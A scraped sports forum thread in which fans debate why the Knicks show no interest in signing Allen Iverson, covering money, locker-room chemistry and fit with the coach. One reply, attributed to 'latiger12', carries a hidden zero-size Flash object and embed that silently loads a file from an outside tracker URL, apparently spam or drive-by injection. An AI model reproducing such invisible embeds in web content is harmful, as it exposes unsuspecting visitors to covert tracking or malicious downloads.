Team sources there is "no interest whatsoever" in Iver

donchris

Next season, keep waiting
According to the NY Post Multiple team sources said there is "no interest whatsoever" in free agent Allen Iverson.

WHYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! We can gamble for one season in Darko but not Iverson?

tiger0330

Legend
Most likely for financial reasons. He probably wanted full MLE money and a longer deal than Walsh wanted to give him, Walsh probably wanted to keep him on a short leash of 1 year. Iverson is in a dilemma, he's too old for any team to build around him long term and after Denver/Detroit he has no cred as a player that you add to a playoff teams roster to make a run for a ring.

donchris

Next season, keep waiting
This is what I don't get about Walsh and DanO. Walsh comes in as GM and can obviously see the team hasn't played defense in 5+ seasons so he hires a coach that did win close to 60 games in a season but has nearly zero emphasis on defense. Then on top of that the team is half ass with shooters. You'd think Iverson would be a perfect fit for DAntoni. Sign him for one season at 5 mill and make a run for it. Walsh was willing to add to the cap for Kidd's old ass but wont make it happen for Iverson for one season?

Well, if the Knicks give Iverson the MLE then the Knicks can't sign Sessions. Sessions is better for this team than Iverson next year and in the future. Easy to see why they don't want Iverson

Arod2k9

Benchwarmer
This is what I don't get about Walsh and DanO. Walsh comes in as GM and can obviously see the team hasn't played defense in 5+ seasons so he hires a coach that did win close to 60 games in a season but has nearly zero emphasis on defense. Then on top of that the team is half ass with shooters. You'd think Iverson would be a perfect fit for DAntoni. Sign him for one season at 5 mill and make a run for it. Walsh was willing to add to the cap for Kidd's old ass but wont make it happen for Iverson for one season?

Iverson's stock hasn't been any lower, so why would you even gamble and bring another cancer to the locker room. We are going on a different direction with good chemistry guys that give their all no matter what. Last season, when we traded Randolph and Crawford the team had 8 players to go and none of then showed up to that game until d'antoni call a timeout to scream at all of them for their effort. I can understand the Kidd and Hill signings because on the court they're true professionals and never give up. How many times can you say that about Iverson?

latiger12

Rookie
Most likely for financial reasons.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Yeah I agree, but he is also like TO (maybe not as bad)